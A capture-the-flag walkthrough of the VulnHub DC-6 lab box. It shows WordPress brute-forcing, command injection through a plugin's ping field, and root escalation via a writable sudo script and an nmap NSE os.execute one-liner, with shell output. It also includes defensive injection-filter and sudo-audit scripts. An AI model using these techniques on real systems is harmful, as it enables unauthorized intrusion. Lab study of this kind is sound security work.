Target IP: 192.168.20.140, Kali IP: 192.168.20.128. If the VM has network trouble (cannot obtain an IP), see the separate post on fixing VulnHub VM networking (no IP obtained).
Information gathering
Scan the target's ports and service versions with nmap and brute-force directories with dirsearch; the results show a WordPress site. Visiting the front end redirects to the hostname wordy, so add the target to the hosts file: 192.168.20.140 wordy
Vulnerability exploitation
Like DC-2, this box is built on WordPress, so again use wpscan to scan the site. wpscan --url http://wordy --enumerate u enumerates usernames; save them to a wordlist user.txt. Then build the password list from the hint the author gives on the VulnHub DC-6 page (filter rockyou.txt for entries containing k01):
┌──(root㉿kali)-[/home/kali/Desktop/DC-6]
└─# cat /home/kali/Desktop/jwt/rockyou.txt | grep k01 > pass.txt
With a username list and a password list, brute-force the logins with wpscan: wpscan --url http://wordy -U user.txt -P pass.txt
Log in to the back end via /wp-admin and browse the features. The Activity Monitor plugin has a Tools page that runs a ping command on a user-supplied host. Testing with ping 127.0.0.1 | ls shows the input is handed to a shell unsanitised, i.e. command injection. Use nc to catch a reverse shell, then upgrade it to an interactive shell.
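The Tools page is exploitable because the host field is concatenated into a shell command line. The script below is an added example, not code from the original write-up or from the Activity Monitor plugin: it reproduces that pattern with echo standing in for ping (the vuln_ping and safe_ping wrappers are hypothetical), puts the strict host check the plugin lacked next to it, and runs a set of constructed payloads of the kind used on the box through both.

```sh
# Added example, not code from the original write-up or from the Activity
# Monitor plugin: it reproduces the class of bug behind "ping 127.0.0.1 | ls"
# and the input check that would have blocked it. The plugin's real ping
# call is stood in for by echo (hypothetical wrappers) so this runs offline.

# Vulnerable pattern: the user-supplied host is spliced into a shell string.
vuln_ping() {
    sh -c "echo PING $1"
}

# Hardened pattern: accept only an IPv4 literal or a plain hostname, then pass
# it as one argument so the shell never sees metacharacters from the user.
safe_ping() {
    host=$1
    if printf '%s' "$host" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'; then
        :
    elif printf '%s' "$host" | grep -Eq '^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*$'; then
        :
    else
        return 1
    fi
    echo "PING $host"
}

# Constructed injection payloads of the kind used against the Tools page.
PAYLOADS='127.0.0.1; echo INJECTED
127.0.0.1 | echo INJECTED
127.0.0.1 $(echo INJECTED)
127.0.0.1 `echo INJECTED`'

# Number of payloads that achieved command execution through vuln_ping (4).
count_vuln_hits() {
    n=0
    while IFS= read -r p; do
        case "$(vuln_ping "$p")" in *INJECTED*) n=$((n + 1)) ;; esac
    done <<EOF
$PAYLOADS
EOF
    echo "$n"
}

# Number of payloads that safe_ping accepted (0).
count_safe_hits() {
    n=0
    while IFS= read -r p; do
        if safe_ping "$p" >/dev/null 2>&1; then n=$((n + 1)); fi
    done <<EOF
$PAYLOADS
EOF
    echo "$n"
}

echo "vulnerable wrapper: $(count_vuln_hits)/4 payloads ran; hardened wrapper: $(count_safe_hits)/4 accepted"
```

The allow-list is the important part: blocklisting `;`, `|` and backticks would still miss `$(...)`, newlines and other separators, whereas only letting through characters that can appear in an address leaves the shell nothing to interpret.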
Privilege escalation
Checking for SUID binaries turns up no escalation path. Browsing the filesystem, /etc/passwd lists four regular users. Looking through their home directories, a things-to-do.txt in mark's directory contains graham's password. Try it:
$ su graham
su graham
Password: GSo7isUM1D4
graham@dc-6:/home$ ls
Next check sudo: the script in jens's home directory can be run as jens.
graham@dc-6:/home/jens$ sudo -l
sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
Now check the file's permissions: it is group-writable by devs, and our user graham is in the devs group, so we have read, write and execute on it.
graham@dc-6:/home/jens$ ls -l
ls -l
total 12524
-rwxrwxr-x 1 jens devs 58 Jun 11 22:40 backups.sh
-rw-r--r-- 1 jens jens 12819077 Jun 11 22:19 backups.tar.gz
graham@dc-6:/home/jens$ id
id
uid=1001(graham) gid=1001(graham) groups=1001(graham),1005(devs)
graham@dc-6:/home/jens$
Append a shell invocation to the script:
graham@dc-6:/home/jens$ echo /bin/sh >> /home/jens/backups.sh
echo /bin/sh >> /home/jens/backups.sh
Then run it through sudo to switch to jens. The tar message shows the script's original backup command still runs first, after which our appended /bin/sh starts with jens's privileges:
graham@dc-6:/home/jens$ sudo -u jens /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
tar: Removing leading `/' from member names
$ whoami
whoami
jens
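The graham to jens step works because a sudo rule points at a file that a group we belong to can write. As an added example that is not part of the original write-up or of DC-6, the script below automates that check: it parses sudo -l style output (a constructed listing) and reports targets whose file, or whose parent directory, the current user can modify. It judges writability from the mode, owner and group shown by ls -ld rather than test -w, so the verdict is about the permission bits even when you run it as root in a lab. The demo tree and the function names are hypothetical.

```sh
# Added example, not from the original write-up: a check for the
# graham -> jens hole, i.e. a sudo rule whose target the current user can
# modify. It reads "sudo -l" output on stdin and decides writability from
# the mode/owner/group shown by "ls -ld" (not "test -w"), so the answer
# reflects the permission bits even when run as root in a lab.
# The demo tree, usernames and paths below are constructed.

# writable_by_me PATH: 0 if the owner, group or other w bit lets the current
# user write PATH.
writable_by_me() {
    path=$1
    [ -e "$path" ] || return 1
    set -- $(ls -ld "$path")
    mode=$(printf '%.10s' "$1")   # drop ACL/SELinux suffixes such as "+" or "."
    owner=$3
    group=$4
    me=$(id -un)
    mygroups=" $(id -Gn) "
    case "$mode" in ??w*)
        if [ "$owner" = "$me" ]; then return 0; fi ;;
    esac
    case "$mode" in ?????w*)
        case "$mygroups" in *" $group "*) return 0 ;; esac ;;
    esac
    case "$mode" in ????????w*) return 0 ;; esac
    return 1
}

# sudo_writable_targets: for each "(runas) [NOPASSWD:] /path" rule on stdin,
# print "RUNAS PATH REASON" when the file, or the directory it lives in (so
# the file could be replaced), is writable by the current user.
sudo_writable_targets() {
    while IFS= read -r line; do
        case "$line" in
            *'('*')'*/*) ;;
            *) continue ;;
        esac
        runas=${line#*\(}
        runas=${runas%%\)*}
        cmd=${line#*\)}
        cmd=/${cmd#*/}            # first absolute path after the ")"
        cmd=${cmd%%[ ,]*}         # cut trailing args or further comma-separated rules
        if writable_by_me "$cmd"; then
            echo "$runas $cmd file-writable"
        elif writable_by_me "$(dirname "$cmd")"; then
            echo "$runas $cmd dir-writable"
        fi
    done
}

# Constructed lab tree mirroring the box: a group-writable backups.sh next to
# a read-only "nmap" in a read-only directory.
demo_setup() {
    d=$(mktemp -d)
    mkdir -p "$d/jens" "$d/bin"
    printf '#!/bin/bash\necho placeholder backup job\n' > "$d/jens/backups.sh"
    chmod 775 "$d/jens/backups.sh"
    : > "$d/bin/nmap"
    chmod 555 "$d/bin/nmap" "$d/bin"
    echo "$d"
}

# demo_run: feed a constructed "sudo -l" listing for the tree and report hits.
demo_run() {
    d=$(demo_setup)
    printf '%s\n' \
        'User graham may run the following commands on dc-6:' \
        "    (jens) NOPASSWD: $d/jens/backups.sh" \
        "    (root) NOPASSWD: $d/bin/nmap" | sudo_writable_targets
    chmod 755 "$d/bin"
    rm -rf "$d"
}

demo_run
```

On the real box, `sudo -l | sudo_writable_targets` as graham would report backups.sh (group devs has the w bit and graham is in devs) and nothing for a root-owned binary under /usr/bin; the parent-directory case matters because a writable directory lets you replace the file even when the file itself is read-only.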
Check sudo again as jens:
$ sudo -l
sudo -l
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap
Look up sudo escalation through nmap (GTFOBins lists two methods). This box runs nmap 7.40, not one of the old versions that still have --interactive (method b), so use method (a): a custom script. .nse is the extension for Nmap scripts, which are Lua, so a one-line script calling os.execute is enough to spawn a root shell.
$ echo "os.execute('/bin/sh')" > /tmp/pass.nse
echo "os.execute('/bin/sh')" > /tmp/pass.nse
$ sudo nmap --script=/tmp/pass.nse
sudo nmap --script=/tmp/pass.nse
Starting Nmap 7.40 ( https://nmap.org ) at 2024-06-11 22:57 AEST
# whoami
root
# find / -name *flag*
/var/www/html/wp-includes/images/icon-pointer-flag.png
/var/www/html/wp-includes/images/icon-pointer-flag-2x.png
/var/lib/mysql/debian-10.1.flag
/usr/lib/x86_64-linux-gnu/perl/5.24.1/bits/waitflags.ph
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/root/theflag.txt
# cat /root/theflag.txt
[ASCII-art banner: WELL DONE]

Congratulations!!!

Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
Root obtained: find locates the flag and cat reads it.